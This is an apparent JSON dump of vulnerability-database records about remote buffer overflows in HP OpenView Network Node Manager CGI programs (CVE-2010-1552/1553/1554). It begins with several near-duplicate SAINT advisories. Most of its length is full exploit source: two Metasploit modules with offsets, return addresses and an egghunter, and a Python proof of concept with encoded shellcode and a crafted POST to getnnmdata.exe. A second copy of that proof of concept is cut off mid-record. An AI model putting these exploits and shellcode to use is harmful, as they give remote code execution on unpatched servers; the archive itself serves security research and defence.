Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:909E1C259F91E79DDA03959C79D8A151", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "SAINT:4C4E1B817EDCE1F9B13110CDFAC660A7", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "type": "saint", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "edition": 2, "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "id": "SAINT:377F10DCAC2F7BEEC4A4AF2B0BFCBA64", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "SAINT:E0B949A72CCB7BC89903D7F732FB87A1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP Openview NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR__<computername>_**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:5F3BAD5DD33554F68C6FA2D69E7F76D5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP Openview NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR__<computername>_**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:4710FCDC0395F3FB13BA4B433FB43F99", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "edition": 2, "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP Openview NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR__<computername>_**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:CB238558CECE292042B771AEC6061FE4", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "type": "saint", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:05:31", "description": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow. CVE-2010-1554. Remote exploit for windows platform", "published": "2011-03-24T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager getnnmdata.exe ICount CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2011-03-24T00:00:00", "id": "EDB-ID:17040", "href": "https://www.exploit-db.com/exploits/17040/", "sourceData": "##\r\n# $Id: hp_nnm_getnnmdata_icount.rb 12121 2011-03-24 00:49:33Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\r\n\t\t\t\tBy sending specially crafted ICount parameter to the getnnmdata.exe CGI,\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12121 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1554' ],\r\n\t\t\t\t\t[ 'OSVDB', '64976' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 750,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'ECX',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ], \r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tegg = rand_text_alpha_upper(4)\r\n\r\n\t\thunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\t\thunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n\t\tboom = rand_text_alpha_upper(target['Offset'])\r\n\t\tboom << generate_seh_record(target.ret)\r\n\t\tboom << hunter + egg + egg\r\n\t\tboom << payload.encoded\r\n\t\tboom << rand_text_alpha_upper(9024 - payload.encoded.length)\r\n\t\t\r\n\t\tsploit = \"SnmpVals=&ICount=-9#{boom}\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'uri'\t\t=> '/OvCgi/getnnmdata.exe',\r\n\t\t\t'method'\t=> 'POST',\r\n\t\t\t'data'\t\t=> sploit\r\n\t\t\t}, 8)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17040/"}, {"lastseen": "2016-02-01T19:17:44", "description": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution. CVE-2010-1554. Remote exploit for windows platform", "published": "2010-07-02T00:00:00", "type": "exploitdb", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-02T00:00:00", "id": "EDB-ID:14181", "href": "https://www.exploit-db.com/exploits/14181/", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1554\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\r\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\r\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\r\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\r\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\r\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\r\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\r\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\r\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\r\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\r\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\r\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a\\x76\\x46\\x51\"\r\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\r\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\r\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\r\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\r\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\r\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\r\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\r\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\r\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\r\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\r\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\r\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\r\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\r\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\r\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\r\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\r\n)\r\n\r\negghunter = (\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\"\r\n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\"\r\n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp1 = '\\xeb\\xf9\\x90\\x90'\r\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\r\n\r\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500\r\n\r\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\r\n\r\nc = httplib.HTTPConnection('172.16.29.149')\r\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint \"\\nDone\\n\" \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14181/"}, {"lastseen": "2016-02-02T07:05:47", "description": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow. CVE-2010-1553. Remote exploit for windows platform", "published": "2011-03-24T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager getnnmdata.exe MaxAge CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2011-03-24T00:00:00", "id": "EDB-ID:17042", "href": "https://www.exploit-db.com/exploits/17042/", "sourceData": "##\r\n# $Id: hp_nnm_getnnmdata_maxage.rb 12121 2011-03-24 00:49:33Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\r\n\t\t\t\tBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12121 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1553' ],\r\n\t\t\t\t\t[ 'OSVDB', '64976' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 750,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'ECX',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tegg = rand_text_alpha_upper(4)\r\n\r\n\t\thunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\t\thunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n\t\tboom = rand_text_alpha_upper(target['Offset'])\r\n\t\tboom << generate_seh_record(target.ret)\r\n\t\tboom << hunter + egg + egg\r\n\t\tboom << payload.encoded\r\n\t\tboom << rand_text_alpha_upper(9024 - payload.encoded.length)\r\n\t\r\n\t\tsploit = \"SnmpVals=&MaxAge=#{boom}\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'uri'\t\t=> '/OvCgi/getnnmdata.exe',\r\n\t\t\t'method'\t=> 'POST',\r\n\t\t\t'data'\t\t=> sploit\r\n\t\t\t}, 8)\r\n\r\n\t\thandler\r\n\t\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17042/"}, {"lastseen": "2016-02-01T19:17:31", "description": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution. CVE-2010-1553. Remote exploit for windows platform", "published": "2010-07-02T00:00:00", "type": "exploitdb", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2010-07-02T00:00:00", "id": "EDB-ID:14180", "href": "https://www.exploit-db.com/exploits/14180/", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1553\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = 